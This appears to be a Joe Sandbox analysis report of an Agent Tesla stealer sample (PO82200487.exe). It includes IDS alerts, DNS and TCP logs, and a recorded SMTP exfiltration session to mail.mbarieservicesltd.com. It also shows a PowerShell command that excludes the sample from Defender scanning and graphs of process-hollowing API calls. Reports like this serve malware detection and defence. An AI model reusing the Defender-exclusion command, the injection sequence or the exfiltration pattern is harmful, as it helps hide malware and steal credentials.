                                            2024-12-05T14:02:10.944038+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949721199.79.62.115587TCP
                                            2024-12-05T14:03:44.666475+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.949721199.79.62.115587TCP
                                            2024-12-05T14:03:44.666475+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.949721199.79.62.115587TCP
                                            2024-12-05T14:03:44.666475+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.949721199.79.62.115587TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 5, 2024 14:02:07.269608021 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:07.389334917 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:07.389524937 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:08.585016012 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:08.585907936 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:08.705821037 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:08.962306976 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:08.963378906 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:09.083862066 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:09.340709925 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:09.341586113 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:09.463759899 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:09.742033005 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:09.742275953 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:09.861948013 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.118119001 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.118335962 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.238122940 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.501981974 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.555280924 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.564009905 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.684432030 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.943371058 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:10.943919897 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.944037914 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.944072008 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:10.944087029 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:02:11.064579964 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:11.064606905 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:11.064616919 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:11.064625978 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:11.427074909 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:02:11.468844891 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:03:44.086952925 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:03:44.206696033 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:03:44.666255951 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:03:44.666475058 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:03:44.666656017 CET58749721199.79.62.115192.168.2.9
                                            Dec 5, 2024 14:03:44.666712046 CET49721587192.168.2.9199.79.62.115
                                            Dec 5, 2024 14:03:44.786185026 CET58749721199.79.62.115192.168.2.9
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 5, 2024 14:02:04.070524931 CET6248953192.168.2.91.1.1.1
                                            Dec 5, 2024 14:02:05.194427013 CET6248953192.168.2.91.1.1.1
                                            Dec 5, 2024 14:02:06.180486917 CET6248953192.168.2.91.1.1.1
                                            Dec 5, 2024 14:02:07.262506962 CET53624891.1.1.1192.168.2.9
                                            Dec 5, 2024 14:02:07.262512922 CET53624891.1.1.1192.168.2.9
                                            Dec 5, 2024 14:02:07.262525082 CET53624891.1.1.1192.168.2.9
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 5, 2024 14:02:04.070524931 CET192.168.2.91.1.1.10xf839Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                            Dec 5, 2024 14:02:05.194427013 CET192.168.2.91.1.1.10xf839Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                            Dec 5, 2024 14:02:06.180486917 CET192.168.2.91.1.1.10xf839Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 5, 2024 14:02:07.262506962 CET1.1.1.1192.168.2.90xf839No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                            Dec 5, 2024 14:02:07.262512922 CET1.1.1.1192.168.2.90xf839No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                            Dec 5, 2024 14:02:07.262525082 CET1.1.1.1192.168.2.90xf839No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Dec 5, 2024 14:02:08.585016012 CET58749721199.79.62.115192.168.2.9220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 05 Dec 2024 18:32:08 +0530
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Dec 5, 2024 14:02:08.585907936 CET49721587192.168.2.9199.79.62.115EHLO 284992
                                            Dec 5, 2024 14:02:08.962306976 CET58749721199.79.62.115192.168.2.9250-md-54.webhostbox.net Hello 284992 [8.46.123.228]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Dec 5, 2024 14:02:08.963378906 CET49721587192.168.2.9199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                            Dec 5, 2024 14:02:09.340709925 CET58749721199.79.62.115192.168.2.9334 UGFzc3dvcmQ6
                                            Dec 5, 2024 14:02:09.742033005 CET58749721199.79.62.115192.168.2.9235 Authentication succeeded
                                            Dec 5, 2024 14:02:09.742275953 CET49721587192.168.2.9199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                            Dec 5, 2024 14:02:10.118119001 CET58749721199.79.62.115192.168.2.9250 OK
                                            Dec 5, 2024 14:02:10.118335962 CET49721587192.168.2.9199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                            Dec 5, 2024 14:02:10.501981974 CET58749721199.79.62.115192.168.2.9250 Accepted
                                            Dec 5, 2024 14:02:10.564009905 CET49721587192.168.2.9199.79.62.115DATA
                                            Dec 5, 2024 14:02:10.943371058 CET58749721199.79.62.115192.168.2.9354 Enter message, ending with "." on a line by itself
                                            Dec 5, 2024 14:02:10.944087029 CET49721587192.168.2.9199.79.62.115.
                                            Dec 5, 2024 14:02:11.427074909 CET58749721199.79.62.115192.168.2.9250 OK id=1tJBUg-001QKK-2P
                                            Dec 5, 2024 14:03:44.086952925 CET49721587192.168.2.9199.79.62.115QUIT
                                            Dec 5, 2024 14:03:44.666255951 CET58749721199.79.62.115192.168.2.9221 md-54.webhostbox.net closing connection

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:08:01:59
                                            Start date:05/12/2024
                                            Path:C:\Users\user\Desktop\PO82200487.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PO82200487.exe"
                                            Imagebase:0x500000
                                            File size:707'584 bytes
                                            MD5 hash:9AF88888E3C54E3A62BC409EA5DE349E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1350373878.0000000004172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:08:02:00
                                            Start date:05/12/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"
                                            Imagebase:0x8c0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:08:02:01
                                            Start date:05/12/2024
                                            Path:C:\Users\user\Desktop\PO82200487.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PO82200487.exe"
                                            Imagebase:0xf40000
                                            File size:707'584 bytes
                                            MD5 hash:9AF88888E3C54E3A62BC409EA5DE349E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2567205281.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2568941236.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Target ID:5
                                            Start time:08:02:01
                                            Start date:05/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:08:02:03
                                            Start date:05/12/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff72d8c0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:10.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:24
                                              Total number of Limit Nodes:0
                                              execution_graph 17487 7efc2b8 17488 7efc303 ReadProcessMemory 17487->17488 17490 7efc347 17488->17490 17495 7efc1c8 17496 7efc210 WriteProcessMemory 17495->17496 17498 7efc267 17496->17498 17499 7efc108 17500 7efc148 VirtualAllocEx 17499->17500 17502 7efc185 17500->17502 17480 7efece0 17481 7efee6b 17480->17481 17483 7efed06 17480->17483 17483->17481 17484 7efd100 17483->17484 17485 7efef60 PostMessageW 17484->17485 17486 7efefcc 17485->17486 17486->17483 17491 7efc030 17492 7efc075 Wow64SetThreadContext 17491->17492 17494 7efc0bd 17492->17494 17503 7efbf80 17504 7efbfc0 ResumeThread 17503->17504 17506 7efbff1 17504->17506 17507 7efc450 17508 7efc4d9 CreateProcessA 17507->17508 17510 7efc69b 17508->17510

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 c33430-c33455 1 c33457 0->1 2 c3345c-c3349a call c33a79 0->2 1->2 4 c334a0 2->4 5 c334a7-c334c3 4->5 6 c334c5 5->6 7 c334cc-c334cd 5->7 6->4 8 c334d2-c334e9 6->8 9 c33868-c3386f 6->9 10 c33806-c33812 6->10 11 c33609-c33620 6->11 12 c335cd-c335da 6->12 13 c33518-c3352c 6->13 14 c335df-c335e5 6->14 15 c3379e-c337b0 6->15 16 c3371d-c33732 6->16 17 c3369c-c336ba 6->17 18 c33625-c33637 6->18 19 c3376b-c33799 6->19 20 c334eb-c334ef 6->20 21 c336e9-c336f5 6->21 22 c33568-c3357a 6->22 23 c3366c-c33670 6->23 24 c33833-c3383c 6->24 25 c335b3-c335c8 6->25 26 c33531-c3353d 6->26 27 c33737-c33743 6->27 28 c337b5-c337c1 6->28 29 c3357f-c3358b 6->29 30 c336bf-c336cb 6->30 31 c3363c-c33640 6->31 7->8 7->9 8->5 50 c33814 10->50 51 c33819-c3382e 10->51 11->5 12->5 13->5 73 c335e7 call c33e30 14->73 74 c335e7 call c33de9 14->74 15->5 16->5 17->5 18->5 19->5 44 c33502-c33509 20->44 45 c334f1-c33500 20->45 52 c336f7 21->52 53 c336fc-c33718 21->53 22->5 42 c33683-c3368a 23->42 43 c33672-c33681 23->43 32 c3384f-c33856 24->32 33 c3383e-c3384d 24->33 25->5 48 c33544-c33563 26->48 49 c3353f 26->49 36 c33745 27->36 37 c3374a-c33766 27->37 40 c337c3 28->40 41 c337c8-c337de 28->41 34 c33592-c335ae 29->34 35 c3358d 29->35 46 c336d2-c336e4 30->46 47 c336cd 30->47 38 c33653-c3365a 31->38 39 c33642-c33651 31->39 58 c3385d-c33863 32->58 33->58 34->5 35->34 36->37 37->5 55 c33661-c33667 38->55 39->55 40->41 69 c337e0 41->69 70 c337e5-c33801 41->70 56 c33691-c33697 42->56 43->56 57 c33510-c33516 44->57 45->57 46->5 47->46 48->5 49->48 50->51 51->5 52->53 53->5 55->5 56->5 57->5 58->5 59 c335ed-c33604 59->5 69->70 70->5 73->59 74->59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -3!$m' E$%}7$%}7$%}7
                                              • API String ID: 0-3499994821
                                              • Opcode ID: 3b108306bdd8264d7c0047c8ec094609cfa3ae0c6c4f4e95a3015221119f7660
                                              • Instruction ID: 7e82d76464692b05aa21a08b529e824736818351f80c16352ae60ce14ade7dd1
                                              • Opcode Fuzzy Hash: 3b108306bdd8264d7c0047c8ec094609cfa3ae0c6c4f4e95a3015221119f7660
                                              • Instruction Fuzzy Hash: 41D12870E1024ADFCB18CF9AC6818AEFBB2FF89311F25855AD415AB254D7349A42CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 75 c33418-c33455 76 c33457 75->76 77 c3345c-c3349a call c33a79 75->77 76->77 79 c334a0 77->79 80 c334a7-c334c3 79->80 81 c334c5 80->81 82 c334cc-c334cd 80->82 81->79 83 c334d2-c334e9 81->83 84 c33868-c3386f 81->84 85 c33806-c33812 81->85 86 c33609-c33620 81->86 87 c335cd-c335da 81->87 88 c33518-c3352c 81->88 89 c335df-c335e5 81->89 90 c3379e-c337b0 81->90 91 c3371d-c33732 81->91 92 c3369c-c336ba 81->92 93 c33625-c33637 81->93 94 c3376b-c33799 81->94 95 c334eb-c334ef 81->95 96 c336e9-c336f5 81->96 97 c33568-c3357a 81->97 98 c3366c-c33670 81->98 99 c33833-c3383c 81->99 100 c335b3-c335c8 81->100 101 c33531-c3353d 81->101 102 c33737-c33743 81->102 103 c337b5-c337c1 81->103 104 c3357f-c3358b 81->104 105 c336bf-c336cb 81->105 106 c3363c-c33640 81->106 82->83 82->84 83->80 125 c33814 85->125 126 c33819-c3382e 85->126 86->80 87->80 88->80 148 c335e7 call c33e30 89->148 149 c335e7 call c33de9 89->149 90->80 91->80 92->80 93->80 94->80 119 c33502-c33509 95->119 120 c334f1-c33500 95->120 127 c336f7 96->127 128 c336fc-c33718 96->128 97->80 117 c33683-c3368a 98->117 118 c33672-c33681 98->118 107 c3384f-c33856 99->107 108 c3383e-c3384d 99->108 100->80 123 c33544-c33563 101->123 124 c3353f 101->124 111 c33745 102->111 112 c3374a-c33766 102->112 115 c337c3 103->115 116 c337c8-c337de 103->116 109 c33592-c335ae 104->109 110 c3358d 104->110 121 c336d2-c336e4 105->121 122 c336cd 105->122 113 c33653-c3365a 106->113 114 c33642-c33651 106->114 133 c3385d-c33863 107->133 108->133 109->80 110->109 111->112 112->80 130 c33661-c33667 113->130 114->130 115->116 144 c337e0 116->144 145 c337e5-c33801 116->145 131 c33691-c33697 117->131 118->131 132 c33510-c33516 119->132 120->132 121->80 122->121 123->80 124->123 125->126 126->80 127->128 128->80 130->80 131->80 132->80 133->80 134 c335ed-c33604 134->80 144->145 145->80 148->134 149->134
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -3!$m' E$%}7$%}7$%}7
                                              • API String ID: 0-3499994821
                                              • Opcode ID: 16c8a894a85c02b5ef4076c34debd6edba9e56d97f3e72367f4fec0d092eef23
                                              • Instruction ID: b633fa26fee3d44e6fa1eac646ea2fb302011a12b4086319038673bd32f3b2a6
                                              • Opcode Fuzzy Hash: 16c8a894a85c02b5ef4076c34debd6edba9e56d97f3e72367f4fec0d092eef23
                                              • Instruction Fuzzy Hash: 57D13970E1424ADFCB18CFA6C5818AEFBB2FF89311F24845AD416AB354D7349A42CF94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 150 c313cf-c31413 151 c31415 150->151 152 c3141a-c31474 call c300e4 150->152 151->152 156 c31477 152->156 157 c3147e-c3149a 156->157 158 c314a3-c314a4 157->158 159 c3149c 157->159 160 c3160b-c3167b call c300f4 158->160 161 c314a9-c314c0 158->161 159->156 159->160 159->161 162 c314c2-c314d7 159->162 163 c31524-c3155a 159->163 164 c315ea-c31606 159->164 165 c314d9-c3151f 159->165 166 c315af-c315cd call c31b81 159->166 167 c3158f-c315aa 159->167 168 c3155f-c31563 159->168 185 c3167d call c32696 160->185 186 c3167d call c32c15 160->186 187 c3167d call c32744 160->187 188 c3167d call c325b9 160->188 189 c3167d call c3272e 160->189 161->157 162->157 163->157 164->157 165->157 178 c315d3-c315e5 166->178 167->157 169 c31576-c3157d 168->169 170 c31565-c31574 168->170 174 c31584-c3158a 169->174 170->174 174->157 178->157 184 c31683-c3168d 185->184 186->184 187->184 188->184 189->184
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $aI$3alk
                                              • API String ID: 0-3362859117
                                              • Opcode ID: bd74083114a479a8ba2fd83a8cd1f51917f53aefa14a715b50d1c6495fe425b9
                                              • Instruction ID: 185558d1f9b391e027a7e5a7c799a097f73ca71ae8b83d454f62f77d93125358
                                              • Opcode Fuzzy Hash: bd74083114a479a8ba2fd83a8cd1f51917f53aefa14a715b50d1c6495fe425b9
                                              • Instruction Fuzzy Hash: 9191F574E152598FDB04CFEAC884ADEBBF2BF89300F24812AD815BB264D7349906CF55

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 191 c313f0-c31413 192 c31415 191->192 193 c3141a-c31474 call c300e4 191->193 192->193 197 c31477 193->197 198 c3147e-c3149a 197->198 199 c314a3-c314a4 198->199 200 c3149c 198->200 201 c3160b-c3167b call c300f4 199->201 202 c314a9-c314c0 199->202 200->197 200->201 200->202 203 c314c2-c314d7 200->203 204 c31524-c3155a 200->204 205 c315ea-c31606 200->205 206 c314d9-c3151f 200->206 207 c315af-c315cd call c31b81 200->207 208 c3158f-c315aa 200->208 209 c3155f-c31563 200->209 226 c3167d call c32696 201->226 227 c3167d call c32c15 201->227 228 c3167d call c32744 201->228 229 c3167d call c325b9 201->229 230 c3167d call c3272e 201->230 202->198 203->198 204->198 205->198 206->198 219 c315d3-c315e5 207->219 208->198 210 c31576-c3157d 209->210 211 c31565-c31574 209->211 215 c31584-c3158a 210->215 211->215 215->198 219->198 225 c31683-c3168d 226->225 227->225 228->225 229->225 230->225
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $aI$3alk
                                              • API String ID: 0-3362859117
                                              • Opcode ID: df3fd060bcd8ff184d0a4d250aef17fed39af4728b9e2ffcd4d97d2665da8c75
                                              • Instruction ID: 8d0d8632989d23628356c5b066e558f90a7f486a95fa1be8a833b89272ab062d
                                              • Opcode Fuzzy Hash: df3fd060bcd8ff184d0a4d250aef17fed39af4728b9e2ffcd4d97d2665da8c75
                                              • Instruction Fuzzy Hash: DE81B374E152198FDB08CFEAC984ADEBBB2FF88300F24912AD915BB264D7349945CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 337 c31b81-c31bb1 338 c31bb3 337->338 339 c31bb8-c31bdd 337->339 338->339 340 c31be4-c31bfa 339->340 341 c31bdf 339->341 342 c31c01-c31c2e 340->342 343 c31bfc 340->343 341->340 344 c31c31 342->344 343->342 345 c31c38-c31c54 344->345 346 c31c56 345->346 347 c31c5d-c31c5e 345->347 346->344 346->347 348 c31c93-c31cb1 346->348 349 c31cb3-c31cd1 346->349 350 c31c63-c31c7a 346->350 351 c31d61-c31d65 346->351 352 c31d06-c31d10 346->352 353 c31cd6-c31cda 346->353 354 c31d3b-c31d41 346->354 355 c31c7c-c31c91 346->355 347->351 348->345 349->345 350->345 358 c31d12 352->358 359 c31d17-c31d36 352->359 356 c31ced-c31cf4 353->356 357 c31cdc-c31ceb 353->357 360 c31d4a-c31d5c 354->360 355->345 363 c31cfb-c31d01 356->363 357->363 358->359 359->345 360->345 363->345
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]bw
                                              • API String ID: 0-3599847727
                                              • Opcode ID: 00e3b0439d2420c5d252df4839d17ed9c9393a8ceae494649bfb332f17369ae2
                                              • Instruction ID: a5c4e0a39f306a34dfedd24010dc0998d3792bd930b531e4d7e7fd4a47659a5f
                                              • Opcode Fuzzy Hash: 00e3b0439d2420c5d252df4839d17ed9c9393a8ceae494649bfb332f17369ae2
                                              • Instruction Fuzzy Hash: 76512C70E152198FDB08CFAAD9506EEFBF2FF89301F28D56AD815B7254D7344A018B68
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 598472aa6dbc17a9713f06edff85dad151b1f2f21bc620a3f222daa1ca28eb6e
                                              • Instruction ID: 4067fa08ee59f294849a1a4c04ea31e65dbc644c52addfd109f09b6a0efe4902
                                              • Opcode Fuzzy Hash: 598472aa6dbc17a9713f06edff85dad151b1f2f21bc620a3f222daa1ca28eb6e
                                              • Instruction Fuzzy Hash: 8C718E78E002089FDB44DFA9D958AEDBBF2FF88300F24816AD919A7365EB315951CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c2ee5e8a0e56f274729a8e9801a958b99954c089f2f52d0dbd5b5fa9d57a60a
                                              • Instruction ID: 57a80ff5406ef4e6b8c85e8fa9289b85ec2de7b4aec73d123f1a912eebc81c53
                                              • Opcode Fuzzy Hash: 9c2ee5e8a0e56f274729a8e9801a958b99954c089f2f52d0dbd5b5fa9d57a60a
                                              • Instruction Fuzzy Hash: 29718F78E00208DFDB44DFA9D958AADBBF2FF88300F248169E919A7364DB315951CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 32d8719270cca459addee88be29624824cc8eb1f3f64e9f7fc4838067aa3f58b
                                              • Instruction ID: 4cbb38ac2bbc76299d6b27e7a8677e929616f8439d274111c53c3c9c274eea2d
                                              • Opcode Fuzzy Hash: 32d8719270cca459addee88be29624824cc8eb1f3f64e9f7fc4838067aa3f58b
                                              • Instruction Fuzzy Hash: 1D311475E156098BEB48CFABD84069EFBF3AFC9300F14D42AC419AB264EB7449128F55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80ea3545083e2ea5502b425bae635dbf6d9763843305eaaee6c5cdccddf695a6
                                              • Instruction ID: 7c386cac5ed386c2c5c7d1868fde99379b0604fd42c2cee5fade1e306d0aa8da
                                              • Opcode Fuzzy Hash: 80ea3545083e2ea5502b425bae635dbf6d9763843305eaaee6c5cdccddf695a6
                                              • Instruction Fuzzy Hash: BE313675E016198BEB48CFABD84069EFBF3EFC9300F14C42AC415AB258EB7449068F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1344277122.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c30000_PO82200487.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac4d2eaa8463c7312b7270bbe00aa1bbb2a5b2d2f5a07edb4553ded42b59f8e7
                                              • Instruction ID: f8b594c6977669de97166b2a50fa3e60773052f879ca7f2f2c274e1924d2203a
                                              • Opcode Fuzzy Hash: ac4d2eaa8463c7312b7270bbe00aa1bbb2a5b2d2f5a07edb4553ded42b59f8e7
                                              • Instruction Fuzzy Hash: 5A313C71E016588FDB18CFA6D9446DEBBB3BFC9300F14C0AAD409AB264DB355A46CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 232 7efc450-7efc4e5 234 7efc51e-7efc53e 232->234 235 7efc4e7-7efc4f1 232->235 242 7efc577-7efc5a6 234->242 243 7efc540-7efc54a 234->243 235->234 236 7efc4f3-7efc4f5 235->236 237 7efc518-7efc51b 236->237 238 7efc4f7-7efc501 236->238 237->234 240 7efc505-7efc514 238->240 241 7efc503 238->241 240->240 244 7efc516 240->244 241->240 249 7efc5df-7efc699 CreateProcessA 242->249 250 7efc5a8-7efc5b2 242->250 243->242 245 7efc54c-7efc54e 243->245 244->237 247 7efc571-7efc574 245->247 248 7efc550-7efc55a 245->248 247->242 251 7efc55e-7efc56d 248->251 252 7efc55c 248->252 263 7efc69b-7efc6a1 249->263 264 7efc6a2-7efc728 249->264 250->249 254 7efc5b4-7efc5b6 250->254 251->251 253 7efc56f 251->253 252->251 253->247 255 7efc5d9-7efc5dc 254->255 256 7efc5b8-7efc5c2 254->256 255->249 258 7efc5c6-7efc5d5 256->258 259 7efc5c4 256->259 258->258 261 7efc5d7 258->261 259->258 261->255 263->264 274 7efc72a-7efc72e 264->274 275 7efc738-7efc73c 264->275 274->275 276 7efc730 274->276 277 7efc73e-7efc742 275->277 278 7efc74c-7efc750 275->278 276->275 277->278 279 7efc744 277->279 280 7efc752-7efc756 278->280 281 7efc760-7efc764 278->281 279->278 280->281 282 7efc758 280->282 